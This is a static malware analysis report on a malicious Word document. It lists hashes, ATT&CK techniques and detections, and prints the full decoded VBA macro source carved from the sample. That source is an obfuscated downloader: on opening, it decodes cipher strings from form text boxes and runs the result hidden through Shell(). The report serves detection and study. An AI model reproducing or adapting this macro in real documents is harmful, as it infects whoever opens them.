Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2496889456af5970…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 311.0 KB
Created: 2018-09-04 02:58:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: f1e1bb8421b90e09372680197c83f26e
SHA-1: d247fb757c36060a0dc35beeeb6437b948be02d7
SHA-256: 2496889456af5970e3eb4fc42790cc6670cd16f91b8f4c7e9b928eef9d29a002
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro that ultimately triggers a Shell() call. The Shell() call passes the content of form1.TextBox2 as the command line, and that command likely downloads and executes a secondary payload. The obfuscated VBA code and the use of Shell() indicate downloader or dropper functionality.

Heuristics (5)

  • [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-6680467-0
  • [medium] OLE_VBA_MACROS (2 related findings): Document contains VBA macro code
  • [critical] OLE_VBA_SHELL: Shell() call in VBA
  • [high] OLE_VBA_DOCOPEN: Document_Open macro
  • [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4057 bytes
SHA-256: e211e4600d2dcde49bb133eee8e4d4e5b77b3a40e6d6c29435782513e86497a1

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Protect1 = "rn"
November1606 Protect1
End Sub

Attribute VB_Name = "form1"
Attribute VB_Base = "0{EBFCD186-BA75-45A7-AD26-EACC5EBFFBBC}{D80A8ED1-1C54-4C83-9A35-0C9CBEEA4EE5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox2_Change()
tstr = form1.TextBox2
Shell tstr, 0
End Sub

Private Sub TextBox3_Change()
nextIter
End Sub

Attribute VB_Name = "Module1"
Function myfuncg(arg2)
string3 = ""
Index = 1
sessdrov Index, string3, arg2
myfuncg = string3
End Function

Function sessdrov(ByRef knuckslo, ByRef deanhoney, buxtedst)
NIROTAMAT = Len(buxtedst)
If knuckslo <= NIROTAMAT Then
deanhoney = deanhoney + simon111(sydneydemo(Mid(buxtedst, knuckslo, 1)), 9)
knuckslo = knuckslo + 1
sessdrov knuckslo, deanhoney, buxtedst
End If
End Function

Function simon111(epismush, iamaxman)
If epismush - iamaxman < 1 Then
simon111 = Right(Left(form1.TextBox1, Len(form1.TextBox1) + epismush - iamaxman), 1)
Else
simon111 = Right(Left(form1.TextBox1, epismush - iamaxman), 1)
End If
End Function

Function sydneydemo(lafoblit)
promyczek = 1
ravenrider = 1
manalive promyczek, ravenrider, lafoblit
sydneydemo = ravenrider
End Function

Function manalive(ByRef promyczek, ByRef ravenrider, lafoblit)
uperturbo = form1.TextBox1
NIROTAMAT = Len(uperturbo)
If knuckslo < NIROTAMAT Then
    If lafoblit <> Right(Left(uperturbo, promyczek), 1) Then
    promyczek = promyczek + 1
    manalive promyczek, ravenrider, lafoblit
    Else
    ravenrider = promyczek
    End If
End If
End Function

Attribute VB_Name = "afka2009"
Function laseropus(ByRef glennweb, speechbeer, frovomu6)
glennweb = glennweb + speechbeer + frovomu6
End Function

Function AVOKINLIDOR()
AVOKINLIDOR = "1"
End Function

Function November1606(ByRef stinghorse)
form1.TextBox3 = stinghorse
End Function

Attribute VB_Name = "rablegio"
Function mark6236(niki1976)
Select Case niki1976
Case 1
mark6236 = "){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9"
Case 2
mark6236 = "\-xfdj$b%9_"
Case 3
mark6236 = ";|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_"
Case 4
mark6236 = "1,,5f{l52"
Case 5
mark6236 = " s(s,,;3xfzdf4ldk)sxx9,,5f{l52"
Case 6
mark6236 = " s(s,,3:fdg|"
Case 7
mark6236 = "\,,nffl8}}0ur 0ri 0qi q0w}bk""cs$ ccf,,;:)zf)n|"
Case 8
mark6236 = "\,,nffl8}}0ur 0ri 0qi it}bk""cs$ ccf,,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52"
Case 9
mark6236 = " ]zf39xfzdf4ldk)sxx9,5f{l52"
End Select
If InStr(niki1976, "LG") Then mark6236 = " ]zf,94aj$ckaxfg""s9njccs$."
End Function

Attribute VB_Name = "SUHCIVESIM"
Function nextIter()
journals (mark6236(1))
dreameramy = ""
caculo32 = "gigobayt"
laseropus dreameramy, form1.TextBox4, caculo32
journals (mark6236(2))
skynetbd = "August1808"
laseropus dreameramy, form1.TextBox4, skynetbd
journals (mark6236(3))
laseropus dreameramy, form1.TextBox4, skynetbd
journals (mark6236(4))
perechem = "tucker3000"
laseropus dreameramy, form1.TextBox4, perechem
journals (mark6236(5))
laseropus dreameramy, form1.TextBox4, perechem
journals (mark6236(6))
laseropus dreameramy, form1.TextBox4, caculo32
journals (mark6236(7))
laseropus dreameramy, form1.TextBox4, caculo32
journals (mark6236(8))
sweets1976 = "HCIVELEGRU"
laseropus dreameramy, form1.TextBox4, sweets1976
journals (mark6236(9))
laseropus dreameramy, form1.TextBox4, sweets1976
journals (mark6236("LGG"))
laseropus dreameramy, form1.TextBox4, ""

form1.TextBox2 = dreameramy
End Function

Function journals(dreameramy)
form1.TextBox4 = myfuncg(dreameramy)
End Function